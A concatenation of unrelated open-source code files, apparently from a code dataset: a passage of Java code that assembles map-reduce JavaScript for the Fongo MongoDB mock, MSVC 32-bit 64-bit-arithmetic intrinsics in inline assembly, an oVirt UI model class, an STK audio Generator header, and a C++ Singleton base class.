"$$$fongoEmits$$$[toSource][$$$fongoEmits$$$[toSource].length] = val;\n" + "};\n"); // Prepare map function. sb.append("var fongoMapFunction = ").append(map).append(";\n"); sb.append("var $$$fongoVars$$$ = new Object();\n"); // For each object, execute in javascript the function. for (DBObject object : objects) { sb.append("$$$fongoVars$$$ = "); FongoJSON.serialize(object, sb, OBJECT_SERIALIZERS); sb.append(";\n"); sb.append("$$$fongoVars$$$['fongoExecute'] = fongoMapFunction;\n"); sb.append("$$$fongoVars$$$.fongoExecute();\n"); // if (sb.length() > 65535) { // Rhino limit :-( // result.add(sb.toString()); // sb.setLength(0); // } } result.add(sb.toString()); // Add Reduce Function sb.setLength(0); sb.append("var reduce = ").append(reduce).append("\n"); sb.append("var $$$fongoOuts$$$ = Array();\n" + "for(var i in $$$fongoEmits$$$) {\n" + "var elem = $$$fongoEmits$$$[i];\n" + "var values = []; id = null; for (var ii in elem) { values.push(elem[ii].value); id = elem[ii].id;}\n" + "$$$fongoOuts$$$[$$$fongoOuts$$$.length] = { _id : id, value : reduce(id, values) };\n" + "}\n"); result.add(sb.toString()); return result; } /** * Create 'reduce' stage output function. */ private List<String> constructReduceOutputStageJavascriptFunction(DBCollection coll, List<DBObject> objects) { List<String> result = new ArrayList<String>(); StringBuilder sb = new StringBuilder(80000); addMongoFunctions(sb); sb.append("var reduce = ").append(reduce).append("\n"); sb.append("var $$$fongoOuts$$$ = new Array();\n"); for (DBObject object : objects) { String objectJson = FongoJSON.serialize(object); String objectValueJson = FongoJSON.serialize(object.get("value")); DBObject existing = coll.findOne(new BasicDBObject().append(FongoDBCollection.ID_FIELD_NAME, object.get(FongoDBCollection.ID_FIELD_NAME))); if (existing == null || existing.get("value") == null) { sb.append("$$$fongoOuts$$$[$$$fongoOuts$$$.length] = ").append(objectJson).append(";\n"); } else { String id = FongoJSON.serialize(object.get(FongoDBCollection.ID_FIELD_NAME)); String existingValueJson = FongoJSON.serialize(existing.get("value")); sb.append("$$$fongoId$$$ = ").append(id).append(";\n"); sb.append("$$$fongoValues$$$ = [ ").append(existingValueJson).append(", ").append(objectValueJson).append("];\n"); sb.append("$$$fongoReduced$$$ = { _id: $$$fongoId$$$, 'value': reduce($$$fongoId$$$, $$$fongoValues$$$)};") .append(";\n"); sb.append("$$$fongoOuts$$$[$$$fongoOuts$$$.length] = $$$fongoReduced$$$;\n"); } if (sb.length() > 65535) { // Rhino limit :-( result.add(sb.toString()); sb.setLength(0); } } result.add(sb.toString()); return result; } private void addMongoFunctions(StringBuilder construct) { // Add some function to javascript engine. construct.append("Array.sum = function(array) {\n" + " var a = 0;\n" + " for (var i = 0; i < array.length; i++) {\n" + " a = a + array[i];\n" + " }\n" + " return a;" + "};\n"); construct.append("printjson = function(a) {" + " print(tojson(a));\n" + " };\n"); construct.append("printjsononeline = function(a) {\n" + " print(tojson(a));\n" + " };\n"); construct.append("assert = function(a) {\n" + " if (!a) throw new FongoAssertException();\n" + " };\n"); construct.append("isString = function(a) {\n" + " return typeof(a) === 'string';\n" + " };\n"); construct.append("isNumber = function(a) {\n" + " return typeof(a) === 'number';\n" + " };\n"); construct.append("isObject = function(a) {\n" + " return typeof(a) === 'object';\n" + " };\n"); construct.append("tojson = function(a) {\n" + " return JSON.stringify(a,null,0);\n" + " };\n"); construct.append("tojsononeline = function(a) {\n" + " return JSON.stringify(a,null,0);\n" + " };\n"); construct.append("NumberLong = function(a) {\n" + " return new FongoNumberLong(a);\n" + "};\n"); construct.append("NumberInt = function(a) {\n" + " return new FongoNumberInt(a);\n" + "};\n"); } public static class FongoNumberLong extends ScriptableObject { Long value; public FongoNumberLong() { } // Method jsConstructor defines the JavaScript constructor public void jsConstructor(Double a) { this.value = a.longValue(); } public double jsFunction_toNumber() { return value; } public double jsFunction_valueOf() { return jsFunction_toNumber(); } @Override public String getClassName() { return "FongoNumberLong"; } public String jsFunction_toString() { return "NumberLong(" + this.value + ")"; } } public static class FongoNumberInt extends ScriptableObject { int value; public FongoNumberInt() { } // Method jsConstructor defines the JavaScript constructor public void jsConstructor(int a) { this.value = a; } public int jsFunction_toNumber() { return value; } public int jsFunction_valueOf() { return value; } @Override public String getClassName() { return "FongoNumberInt"; } public String jsFunction_toString() { return "NumberInt(" + this.value + ")"; } } private static class FongoLongSerializer implements ObjectSerializer { @Override public String serialize(final Object obj) { StringBuilder builder = new StringBuilder(); serialize(obj, builder); return builder.toString(); } @Override public void serialize(final Object obj, final StringBuilder buf) { buf.append("NumberLong(").append(obj.toString()).append(")"); } } private static class FongoIntegerSerializer implements ObjectSerializer { @Override public String serialize(final Object obj) { StringBuilder builder = new StringBuilder(); serialize(obj, builder); return builder.toString(); } @Override public void serialize(final Object obj, final StringBuilder buf) { buf.append("NumberInt(").append(obj.toString()).append(")"); } } static final Map<Class<?>, ObjectSerializer> OBJECT_SERIALIZERS = new HashMap<Class<?>, ObjectSerializer>(); static { OBJECT_SERIALIZERS.put(Long.class, new FongoLongSerializer()); OBJECT_SERIALIZERS.put(Integer.class, new FongoIntegerSerializer()); } }
7,352
10,125
/** @file MSVC compiler intrinsics for IA32. Copyright (c) 2020, nms42. All rights reserved. SPDX-License-Identifier: BSD-3-Clause **/ /* Came from https://gist.github.com/mmozeiko/6a365d6c483fc721b63a#file-win32_crt_math-cpp */ #ifdef _M_IX86 // use this file only for 32-bit architecture #define CRT_LOWORD(x) dword ptr [x+0] #define CRT_HIWORD(x) dword ptr [x+4] __declspec(naked) void _alldiv() { #define DVND esp + 16 // stack address of dividend (a) #define DVSR esp + 24 // stack address of divisor (b) __asm { push edi push esi push ebx ; Determine sign of the result (edi = 0 if result is positive, non-zero ; otherwise) and make operands positive. xor edi,edi ; result sign assumed positive mov eax,CRT_HIWORD(DVND) ; hi word of a or eax,eax ; test to see if signed jge short L1 ; skip rest if a is already positive inc edi ; complement result sign flag mov edx,CRT_LOWORD(DVND) ; lo word of a neg eax ; make a positive neg edx sbb eax,0 mov CRT_HIWORD(DVND),eax ; save positive value mov CRT_LOWORD(DVND),edx L1: mov eax,CRT_HIWORD(DVSR) ; hi word of b or eax,eax ; test to see if signed jge short L2 ; skip rest if b is already positive inc edi ; complement the result sign flag mov edx,CRT_LOWORD(DVSR) ; lo word of a neg eax ; make b positive neg edx sbb eax,0 mov CRT_HIWORD(DVSR),eax ; save positive value mov CRT_LOWORD(DVSR),edx L2: ; ; Now do the divide. First look to see if the divisor is less than 4194304K. ; If so, then we can use a simple algorithm with word divides, otherwise ; things get a little more complex. ; ; NOTE - eax currently contains the high order word of DVSR ; or eax,eax ; check to see if divisor < 4194304K jnz short L3 ; nope, gotta do this the hard way mov ecx,CRT_LOWORD(DVSR) ; load divisor mov eax,CRT_HIWORD(DVND) ; load high word of dividend xor edx,edx div ecx ; eax <- high order bits of quotient mov ebx,eax ; save high bits of quotient mov eax,CRT_LOWORD(DVND) ; edx:eax <- remainder:lo word of dividend div ecx ; eax <- low order bits of quotient mov edx,ebx ; edx:eax <- quotient jmp short L4 ; set sign, restore stack and return ; ; Here we do it the hard way. Remember, eax contains the high word of DVSR ; L3: mov ebx,eax ; ebx:ecx <- divisor mov ecx,CRT_LOWORD(DVSR) mov edx,CRT_HIWORD(DVND) ; edx:eax <- dividend mov eax,CRT_LOWORD(DVND) L5: shr ebx,1 ; shift divisor right one bit rcr ecx,1 shr edx,1 ; shift dividend right one bit rcr eax,1 or ebx,ebx jnz short L5 ; loop until divisor < 4194304K div ecx ; now divide, ignore remainder mov esi,eax ; save quotient ; ; We may be off by one, so to check, we will multiply the quotient ; by the divisor and check the result against the orignal dividend ; Note that we must also check for overflow, which can occur if the ; dividend is close to 2**64 and the quotient is off by 1. ; mul CRT_HIWORD(DVSR) ; QUOT * CRT_HIWORD(DVSR) mov ecx,eax mov eax,CRT_LOWORD(DVSR) mul esi ; QUOT * CRT_LOWORD(DVSR) add edx,ecx ; EDX:EAX = QUOT * DVSR jc short L6 ; carry means Quotient is off by 1 ; ; do long compare here between original dividend and the result of the ; multiply in edx:eax. If original is larger or equal, we are ok, otherwise ; subtract one (1) from the quotient. ; cmp edx,CRT_HIWORD(DVND) ; compare hi words of result and original ja short L6 ; if result > original, do subtract jb short L7 ; if result < original, we are ok cmp eax,CRT_LOWORD(DVND) ; hi words are equal, compare lo words jbe short L7 ; if less or equal we are ok, else subtract L6: dec esi ; subtract 1 from quotient L7: xor edx,edx ; edx:eax <- quotient mov eax,esi ; ; Just the cleanup left to do. edx:eax contains the quotient. Set the sign ; according to the save value, cleanup the stack, and return. ; L4: dec edi ; check to see if result is negative jnz short L8 ; if EDI == 0, result should be negative neg edx ; otherwise, negate the result neg eax sbb edx,0 ; ; Restore the saved registers and return. ; L8: pop ebx pop esi pop edi ret 16 } #undef DVND #undef DVSR } __declspec(naked) void _alldvrm() { #define DVND esp + 16 // stack address of dividend (a) #define DVSR esp + 24 // stack address of divisor (b) __asm { push edi push esi push ebp ; Determine sign of the quotient (edi = 0 if result is positive, non-zero ; otherwise) and make operands positive. ; Sign of the remainder is kept in ebp. xor edi,edi ; result sign assumed positive xor ebp,ebp ; result sign assumed positive mov eax,CRT_HIWORD(DVND) ; hi word of a or eax,eax ; test to see if signed jge short L1 ; skip rest if a is already positive inc edi ; complement result sign flag inc ebp ; complement result sign flag mov edx,CRT_LOWORD(DVND) ; lo word of a neg eax ; make a positive neg edx sbb eax,0 mov CRT_HIWORD(DVND),eax ; save positive value mov CRT_LOWORD(DVND),edx L1: mov eax,CRT_HIWORD(DVSR) ; hi word of b or eax,eax ; test to see if signed jge short L2 ; skip rest if b is already positive inc edi ; complement the result sign flag mov edx,CRT_LOWORD(DVSR) ; lo word of a neg eax ; make b positive neg edx sbb eax,0 mov CRT_HIWORD(DVSR),eax ; save positive value mov CRT_LOWORD(DVSR),edx L2: ; ; Now do the divide. First look to see if the divisor is less than 4194304K. ; If so, then we can use a simple algorithm with word divides, otherwise ; things get a little more complex. ; ; NOTE - eax currently contains the high order word of DVSR ; or eax,eax ; check to see if divisor < 4194304K jnz short L3 ; nope, gotta do this the hard way mov ecx,CRT_LOWORD(DVSR) ; load divisor mov eax,CRT_HIWORD(DVND) ; load high word of dividend xor edx,edx div ecx ; eax <- high order bits of quotient mov ebx,eax ; save high bits of quotient mov eax,CRT_LOWORD(DVND) ; edx:eax <- remainder:lo word of dividend div ecx ; eax <- low order bits of quotient mov esi,eax ; ebx:esi <- quotient ; ; Now we need to do a multiply so that we can compute the remainder. ; mov eax,ebx ; set up high word of quotient mul CRT_LOWORD(DVSR) ; CRT_HIWORD(QUOT) * DVSR mov ecx,eax ; save the result in ecx mov eax,esi ; set up low word of quotient mul CRT_LOWORD(DVSR) ; CRT_LOWORD(QUOT) * DVSR add edx,ecx ; EDX:EAX = QUOT * DVSR jmp short L4 ; complete remainder calculation ; ; Here we do it the hard way. Remember, eax contains the high word of DVSR ; L3: mov ebx,eax ; ebx:ecx <- divisor mov ecx,CRT_LOWORD(DVSR) mov edx,CRT_HIWORD(DVND) ; edx:eax <- dividend mov eax,CRT_LOWORD(DVND) L5: shr ebx,1 ; shift divisor right one bit rcr ecx,1 shr edx,1 ; shift dividend right one bit rcr eax,1 or ebx,ebx jnz short L5 ; loop until divisor < 4194304K div ecx ; now divide, ignore remainder mov esi,eax ; save quotient ; ; We may be off by one, so to check, we will multiply the quotient ; by the divisor and check the result against the orignal dividend ; Note that we must also check for overflow, which can occur if the ; dividend is close to 2**64 and the quotient is off by 1. ; mul CRT_HIWORD(DVSR) ; QUOT * CRT_HIWORD(DVSR) mov ecx,eax mov eax,CRT_LOWORD(DVSR) mul esi ; QUOT * CRT_LOWORD(DVSR) add edx,ecx ; EDX:EAX = QUOT * DVSR jc short L6 ; carry means Quotient is off by 1 ; ; do long compare here between original dividend and the result of the ; multiply in edx:eax. If original is larger or equal, we are ok, otherwise ; subtract one (1) from the quotient. ; cmp edx,CRT_HIWORD(DVND) ; compare hi words of result and original ja short L6 ; if result > original, do subtract jb short L7 ; if result < original, we are ok cmp eax,CRT_LOWORD(DVND) ; hi words are equal, compare lo words jbe short L7 ; if less or equal we are ok, else subtract L6: dec esi ; subtract 1 from quotient sub eax,CRT_LOWORD(DVSR) ; subtract divisor from result sbb edx,CRT_HIWORD(DVSR) L7: xor ebx,ebx ; ebx:esi <- quotient L4: ; ; Calculate remainder by subtracting the result from the original dividend. ; Since the result is already in a register, we will do the subtract in the ; opposite direction and negate the result if necessary. ; sub eax,CRT_LOWORD(DVND) ; subtract dividend from result sbb edx,CRT_HIWORD(DVND) ; ; Now check the result sign flag to see if the result is supposed to be positive ; or negative. It is currently negated (because we subtracted in the 'wrong' ; direction), so if the sign flag is set we are done, otherwise we must negate ; the result to make it positive again. ; dec ebp ; check result sign flag jns short L9 ; result is ok, set up the quotient neg edx ; otherwise, negate the result neg eax sbb edx,0 ; ; Now we need to get the quotient into edx:eax and the remainder into ebx:ecx. ; L9: mov ecx,edx mov edx,ebx mov ebx,ecx mov ecx,eax mov eax,esi ; ; Just the cleanup left to do. edx:eax contains the quotient. Set the sign ; according to the save value, cleanup the stack, and return. ; dec edi ; check to see if result is negative jnz short L8 ; if EDI == 0, result should be negative neg edx ; otherwise, negate the result neg eax sbb edx,0 ; ; Restore the saved registers and return. ; L8: pop ebp pop esi pop edi ret 16 } #undef DVND #undef DVSR } __declspec(naked) void _allmul() { #define A esp + 8 // stack address of a #define B esp + 16 // stack address of b __asm { push ebx mov eax,CRT_HIWORD(A) mov ecx,CRT_LOWORD(B) mul ecx ;eax has AHI, ecx has BLO, so AHI * BLO mov ebx,eax ;save result mov eax,CRT_LOWORD(A) mul CRT_HIWORD(B) ;ALO * BHI add ebx,eax ;ebx = ((ALO * BHI) + (AHI * BLO)) mov eax,CRT_LOWORD(A) ;ecx = BLO mul ecx ;so edx:eax = ALO*BLO add edx,ebx ;now edx has all the LO*HI stuff pop ebx ret 16 ; callee restores the stack } #undef A #undef B } __declspec(naked) void _allrem() { #define DVND esp + 12 // stack address of dividend (a) #define DVSR esp + 20 // stack address of divisor (b) __asm { push ebx push edi ; Determine sign of the result (edi = 0 if result is positive, non-zero ; otherwise) and make operands positive. xor edi,edi ; result sign assumed positive mov eax,CRT_HIWORD(DVND) ; hi word of a or eax,eax ; test to see if signed jge short L1 ; skip rest if a is already positive inc edi ; complement result sign flag bit mov edx,CRT_LOWORD(DVND) ; lo word of a neg eax ; make a positive neg edx sbb eax,0 mov CRT_HIWORD(DVND),eax ; save positive value mov CRT_LOWORD(DVND),edx L1: mov eax,CRT_HIWORD(DVSR) ; hi word of b or eax,eax ; test to see if signed jge short L2 ; skip rest if b is already positive mov edx,CRT_LOWORD(DVSR) ; lo word of b neg eax ; make b positive neg edx sbb eax,0 mov CRT_HIWORD(DVSR),eax ; save positive value mov CRT_LOWORD(DVSR),edx L2: ; ; Now do the divide. First look to see if the divisor is less than 4194304K. ; If so, then we can use a simple algorithm with word divides, otherwise ; things get a little more complex. ; ; NOTE - eax currently contains the high order word of DVSR ; or eax,eax ; check to see if divisor < 4194304K jnz short L3 ; nope, gotta do this the hard way mov ecx,CRT_LOWORD(DVSR) ; load divisor mov eax,CRT_HIWORD(DVND) ; load high word of dividend xor edx,edx div ecx ; edx <- remainder mov eax,CRT_LOWORD(DVND) ; edx:eax <- remainder:lo word of dividend div ecx ; edx <- final remainder mov eax,edx ; edx:eax <- remainder xor edx,edx dec edi ; check result sign flag jns short L4 ; negate result, restore stack and return jmp short L8 ; result sign ok, restore stack and return ; ; Here we do it the hard way. Remember, eax contains the high word of DVSR ; L3: mov ebx,eax ; ebx:ecx <- divisor mov ecx,CRT_LOWORD(DVSR) mov edx,CRT_HIWORD(DVND) ; edx:eax <- dividend mov eax,CRT_LOWORD(DVND) L5: shr ebx,1 ; shift divisor right one bit rcr ecx,1 shr edx,1 ; shift dividend right one bit rcr eax,1 or ebx,ebx jnz short L5 ; loop until divisor < 4194304K div ecx ; now divide, ignore remainder ; ; We may be off by one, so to check, we will multiply the quotient ; by the divisor and check the result against the orignal dividend ; Note that we must also check for overflow, which can occur if the ; dividend is close to 2**64 and the quotient is off by 1. ; mov ecx,eax ; save a copy of quotient in ECX mul CRT_HIWORD(DVSR) xchg ecx,eax ; save product, get quotient in EAX mul CRT_LOWORD(DVSR) add edx,ecx ; EDX:EAX = QUOT * DVSR jc short L6 ; carry means Quotient is off by 1 ; ; do long compare here between original dividend and the result of the ; multiply in edx:eax. If original is larger or equal, we are ok, otherwise ; subtract the original divisor from the result. ; cmp edx,CRT_HIWORD(DVND) ; compare hi words of result and original ja short L6 ; if result > original, do subtract jb short L7 ; if result < original, we are ok cmp eax,CRT_LOWORD(DVND) ; hi words are equal, compare lo words jbe short L7 ; if less or equal we are ok, else subtract L6: sub eax,CRT_LOWORD(DVSR) ; subtract divisor from result sbb edx,CRT_HIWORD(DVSR) L7: ; ; Calculate remainder by subtracting the result from the original dividend. ; Since the result is already in a register, we will do the subtract in the ; opposite direction and negate the result if necessary. ; sub eax,CRT_LOWORD(DVND) ; subtract dividend from result sbb edx,CRT_HIWORD(DVND) ; ; Now check the result sign flag to see if the result is supposed to be positive ; or negative. It is currently negated (because we subtracted in the 'wrong' ; direction), so if the sign flag is set we are done, otherwise we must negate ; the result to make it positive again. ; dec edi ; check result sign flag jns short L8 ; result is ok, restore stack and return L4: neg edx ; otherwise, negate the result neg eax sbb edx,0 ; ; Just the cleanup left to do. edx:eax contains the quotient. ; Restore the saved registers and return. ; L8: pop edi pop ebx ret 16 } #undef DVND #undef DVSR } __declspec(naked) void _allshl() { __asm { ; ; Handle shifts of 64 or more bits (all get 0) ; cmp cl, 64 jae short RETZERO ; ; Handle shifts of between 0 and 31 bits ; cmp cl, 32 jae short MORE32 shld edx,eax,cl shl eax,cl ret ; ; Handle shifts of between 32 and 63 bits ; MORE32: mov edx,eax xor eax,eax and cl,31 shl edx,cl ret ; ; return 0 in edx:eax ; RETZERO: xor eax,eax xor edx,edx ret } } __declspec(naked) void _allshr() { __asm { ; ; Handle shifts of 64 bits or more (if shifting 64 bits or more, the result ; depends only on the high order bit of edx). ; cmp cl,64 jae short RETSIGN ; ; Handle shifts of between 0 and 31 bits ; cmp cl, 32 jae short MORE32 shrd eax,edx,cl sar edx,cl ret ; ; Handle shifts of between 32 and 63 bits ; MORE32: mov eax,edx sar edx,31 and cl,31 sar eax,cl ret ; ; Return double precision 0 or -1, depending on the sign of edx ; RETSIGN: sar edx,31 mov eax,edx ret } } __declspec(naked) void _aulldiv() { #define DVND esp + 12 // stack address of dividend (a) #define DVSR esp + 20 // stack address of divisor (b) __asm { push ebx push esi ; ; Now do the divide. First look to see if the divisor is less than 4194304K. ; If so, then we can use a simple algorithm with word divides, otherwise ; things get a little more complex. ; mov eax,CRT_HIWORD(DVSR) ; check to see if divisor < 4194304K or eax,eax jnz short L1 ; nope, gotta do this the hard way mov ecx,CRT_LOWORD(DVSR) ; load divisor mov eax,CRT_HIWORD(DVND) ; load high word of dividend xor edx,edx div ecx ; get high order bits of quotient mov ebx,eax ; save high bits of quotient mov eax,CRT_LOWORD(DVND) ; edx:eax <- remainder:lo word of dividend div ecx ; get low order bits of quotient mov edx,ebx ; edx:eax <- quotient hi:quotient lo jmp short L2 ; restore stack and return ; ; Here we do it the hard way. Remember, eax contains DVSRHI ; L1: mov ecx,eax ; ecx:ebx <- divisor mov ebx,CRT_LOWORD(DVSR) mov edx,CRT_HIWORD(DVND) ; edx:eax <- dividend mov eax,CRT_LOWORD(DVND) L3: shr ecx,1 ; shift divisor right one bit; hi bit <- 0 rcr ebx,1 shr edx,1 ; shift dividend right one bit; hi bit <- 0 rcr eax,1 or ecx,ecx jnz short L3 ; loop until divisor < 4194304K div ebx ; now divide, ignore remainder mov esi,eax ; save quotient ; ; We may be off by one, so to check, we will multiply the quotient ; by the divisor and check the result against the orignal dividend ; Note that we must also check for overflow, which can occur if the ; dividend is close to 2**64 and the quotient is off by 1. ; mul CRT_HIWORD(DVSR) ; QUOT * CRT_HIWORD(DVSR) mov ecx,eax mov eax,CRT_LOWORD(DVSR) mul esi ; QUOT * CRT_LOWORD(DVSR) add edx,ecx ; EDX:EAX = QUOT * DVSR jc short L4 ; carry means Quotient is off by 1 ; ; do long compare here between original dividend and the result of the ; multiply in edx:eax. If original is larger or equal, we are ok, otherwise ; subtract one (1) from the quotient. ; cmp edx,CRT_HIWORD(DVND) ; compare hi words of result and original ja short L4 ; if result > original, do subtract jb short L5 ; if result < original, we are ok cmp eax,CRT_LOWORD(DVND) ; hi words are equal, compare lo words jbe short L5 ; if less or equal we are ok, else subtract L4: dec esi ; subtract 1 from quotient L5: xor edx,edx ; edx:eax <- quotient mov eax,esi ; ; Just the cleanup left to do. edx:eax contains the quotient. ; Restore the saved registers and return. ; L2: pop esi pop ebx ret 16 } #undef DVND #undef DVSR } __declspec(naked) void _aulldvrm() { #define DVND esp + 8 // stack address of dividend (a) #define DVSR esp + 16 // stack address of divisor (b) __asm { push esi ; ; Now do the divide. First look to see if the divisor is less than 4194304K. ; If so, then we can use a simple algorithm with word divides, otherwise ; things get a little more complex. ; mov eax,CRT_HIWORD(DVSR) ; check to see if divisor < 4194304K or eax,eax jnz short L1 ; nope, gotta do this the hard way mov ecx,CRT_LOWORD(DVSR) ; load divisor mov eax,CRT_HIWORD(DVND) ; load high word of dividend xor edx,edx div ecx ; get high order bits of quotient mov ebx,eax ; save high bits of quotient mov eax,CRT_LOWORD(DVND) ; edx:eax <- remainder:lo word of dividend div ecx ; get low order bits of quotient mov esi,eax ; ebx:esi <- quotient ; ; Now we need to do a multiply so that we can compute the remainder. ; mov eax,ebx ; set up high word of quotient mul CRT_LOWORD(DVSR) ; CRT_HIWORD(QUOT) * DVSR mov ecx,eax ; save the result in ecx mov eax,esi ; set up low word of quotient mul CRT_LOWORD(DVSR) ; CRT_LOWORD(QUOT) * DVSR add edx,ecx ; EDX:EAX = QUOT * DVSR jmp short L2 ; complete remainder calculation ; ; Here we do it the hard way. Remember, eax contains DVSRHI ; L1: mov ecx,eax ; ecx:ebx <- divisor mov ebx,CRT_LOWORD(DVSR) mov edx,CRT_HIWORD(DVND) ; edx:eax <- dividend mov eax,CRT_LOWORD(DVND) L3: shr ecx,1 ; shift divisor right one bit; hi bit <- 0 rcr ebx,1 shr edx,1 ; shift dividend right one bit; hi bit <- 0 rcr eax,1 or ecx,ecx jnz short L3 ; loop until divisor < 4194304K div ebx ; now divide, ignore remainder mov esi,eax ; save quotient ; ; We may be off by one, so to check, we will multiply the quotient ; by the divisor and check the result against the orignal dividend ; Note that we must also check for overflow, which can occur if the ; dividend is close to 2**64 and the quotient is off by 1. ; mul CRT_HIWORD(DVSR) ; QUOT * CRT_HIWORD(DVSR) mov ecx,eax mov eax,CRT_LOWORD(DVSR) mul esi ; QUOT * CRT_LOWORD(DVSR) add edx,ecx ; EDX:EAX = QUOT * DVSR jc short L4 ; carry means Quotient is off by 1 ; ; do long compare here between original dividend and the result of the ; multiply in edx:eax. If original is larger or equal, we are ok, otherwise ; subtract one (1) from the quotient. ; cmp edx,CRT_HIWORD(DVND) ; compare hi words of result and original ja short L4 ; if result > original, do subtract jb short L5 ; if result < original, we are ok cmp eax,CRT_LOWORD(DVND) ; hi words are equal, compare lo words jbe short L5 ; if less or equal we are ok, else subtract L4: dec esi ; subtract 1 from quotient sub eax,CRT_LOWORD(DVSR) ; subtract divisor from result sbb edx,CRT_HIWORD(DVSR) L5: xor ebx,ebx ; ebx:esi <- quotient L2: ; ; Calculate remainder by subtracting the result from the original dividend. ; Since the result is already in a register, we will do the subtract in the ; opposite direction and negate the result. ; sub eax,CRT_LOWORD(DVND) ; subtract dividend from result sbb edx,CRT_HIWORD(DVND) neg edx ; otherwise, negate the result neg eax sbb edx,0 ; ; Now we need to get the quotient into edx:eax and the remainder into ebx:ecx. ; mov ecx,edx mov edx,ebx mov ebx,ecx mov ecx,eax mov eax,esi ; ; Just the cleanup left to do. edx:eax contains the quotient. ; Restore the saved registers and return. ; pop esi ret 16 } #undef DVND #undef DVSR } __declspec(naked) void _aullrem() { #define DVND esp + 8 // stack address of dividend (a) #define DVSR esp + 16 // stack address of divisor (b) __asm { push ebx ; Now do the divide. First look to see if the divisor is less than 4194304K. ; If so, then we can use a simple algorithm with word divides, otherwise ; things get a little more complex. ; mov eax,CRT_HIWORD(DVSR) ; check to see if divisor < 4194304K or eax,eax jnz short L1 ; nope, gotta do this the hard way mov ecx,CRT_LOWORD(DVSR) ; load divisor mov eax,CRT_HIWORD(DVND) ; load high word of dividend xor edx,edx div ecx ; edx <- remainder, eax <- quotient mov eax,CRT_LOWORD(DVND) ; edx:eax <- remainder:lo word of dividend div ecx ; edx <- final remainder mov eax,edx ; edx:eax <- remainder xor edx,edx jmp short L2 ; restore stack and return ; ; Here we do it the hard way. Remember, eax contains DVSRHI ; L1: mov ecx,eax ; ecx:ebx <- divisor mov ebx,CRT_LOWORD(DVSR) mov edx,CRT_HIWORD(DVND) ; edx:eax <- dividend mov eax,CRT_LOWORD(DVND) L3: shr ecx,1 ; shift divisor right one bit; hi bit <- 0 rcr ebx,1 shr edx,1 ; shift dividend right one bit; hi bit <- 0 rcr eax,1 or ecx,ecx jnz short L3 ; loop until divisor < 4194304K div ebx ; now divide, ignore remainder ; ; We may be off by one, so to check, we will multiply the quotient ; by the divisor and check the result against the orignal dividend ; Note that we must also check for overflow, which can occur if the ; dividend is close to 2**64 and the quotient is off by 1. ; mov ecx,eax ; save a copy of quotient in ECX mul CRT_HIWORD(DVSR) xchg ecx,eax ; put partial product in ECX, get quotient in EAX mul CRT_LOWORD(DVSR) add edx,ecx ; EDX:EAX = QUOT * DVSR jc short L4 ; carry means Quotient is off by 1 ; ; do long compare here between original dividend and the result of the ; multiply in edx:eax. If original is larger or equal, we're ok, otherwise ; subtract the original divisor from the result. ; cmp edx,CRT_HIWORD(DVND) ; compare hi words of result and original ja short L4 ; if result > original, do subtract jb short L5 ; if result < original, we're ok cmp eax,CRT_LOWORD(DVND) ; hi words are equal, compare lo words jbe short L5 ; if less or equal we're ok, else subtract L4: sub eax,CRT_LOWORD(DVSR) ; subtract divisor from result sbb edx,CRT_HIWORD(DVSR) L5: ; ; Calculate remainder by subtracting the result from the original dividend. ; Since the result is already in a register, we will perform the subtract in ; the opposite direction and negate the result to make it positive. ; sub eax,CRT_LOWORD(DVND) ; subtract original dividend from result sbb edx,CRT_HIWORD(DVND) neg edx ; and negate it neg eax sbb edx,0 ; ; Just the cleanup left to do. dx:ax contains the remainder. ; Restore the saved registers and return. ; L2: pop ebx ret 16 } #undef DVND #undef DVSR } __declspec(naked) void _aullshr() { __asm { cmp cl,64 jae short RETZERO ; ; Handle shifts of between 0 and 31 bits ; cmp cl, 32 jae short MORE32 shrd eax,edx,cl shr edx,cl ret ; ; Handle shifts of between 32 and 63 bits ; MORE32: mov eax,edx xor edx,edx and cl,31 shr eax,cl ret ; ; return 0 in edx:eax ; RETZERO: xor eax,eax xor edx,edx ret } } #undef CRT_LOWORD #undef CRT_HIWORD #endif
15,874
347
package org.ovirt.engine.ui.uicommonweb.models.vms; import java.util.List; import org.ovirt.engine.core.common.action.ActionParametersBase; import org.ovirt.engine.core.common.action.ActionType; import org.ovirt.engine.core.common.action.RemoveVmTemplateInterfaceParameters; import org.ovirt.engine.core.common.businessentities.network.VmNetworkInterface; import org.ovirt.engine.ui.uicommonweb.help.HelpTag; import org.ovirt.engine.ui.uicommonweb.models.ListModel; import org.ovirt.engine.ui.uicompat.ConstantsManager; public class RemoveVmTemplateInterfaceModel extends RemoveVmInterfaceModel{ public RemoveVmTemplateInterfaceModel(ListModel sourceListModel, List<VmNetworkInterface> vnics, boolean isFullMsg) { super(sourceListModel, vnics, isFullMsg); setHelpTag(HelpTag.remove_network_interface_tmps); setHashName("remove_network_interface_tmps"); //$NON-NLS-1$ } @Override protected String getRemoveVnicFullMsg(VmNetworkInterface vnic){ return ConstantsManager.getInstance().getMessages().vnicFromTemplate(vnic.getName(), vnic.getVmName()); } @Override protected ActionParametersBase getRemoveVmInterfaceParams(VmNetworkInterface vnic) { return new RemoveVmTemplateInterfaceParameters(vnic.getVmId(), vnic.getId()); } @Override protected ActionType getActionType() { return ActionType.RemoveVmTemplateInterface; } }
493
7,892
<gh_stars>1000+ /***************************************************/ /*! \class Generator \brief STK abstract unit generator parent class. This class provides common functionality for STK unit generator sample-source subclasses. by <NAME> and <NAME>, 1995 - 2005. */ /***************************************************/ #ifndef STK_GENERATOR_H #define STK_GENERATOR_H #include "Stk.h" namespace Nyq { class Generator : public Stk { public: //! Class constructor. Generator( void ); //! Class destructor. virtual ~Generator( void ); //! Return the last output value. virtual StkFloat lastOut( void ) const { return lastOutput_; }; //! Compute one sample and output. StkFloat tick( void ); //! Fill a channel of the StkFrames object with computed outputs. /*! The \c channel argument should be zero or greater (the first channel is specified by 0). An StkError will be thrown if the \c channel argument is equal to or greater than the number of channels in the StkFrames object. */ StkFrames& tick( StkFrames& frames, unsigned int channel = 0 ); protected: // This abstract function must be implemented in all subclasses. // It is used to get around a C++ problem with overloaded virtual // functions. virtual StkFloat computeSample( void ) = 0; StkFloat lastOutput_; }; } // namespace Nyq #endif
403
387
#pragma once namespace Arcane { class Singleton { public: Singleton(const Singleton &singleton) = delete; // Get rid of copy ctor Singleton(const Singleton &&singleton) = delete; // Get rid of move ctor Singleton& operator=(const Singleton &singleton) = delete; Singleton& operator=(const Singleton &&singleton) = delete; protected: Singleton() = default; virtual ~Singleton() = default; }; }
138
2,707
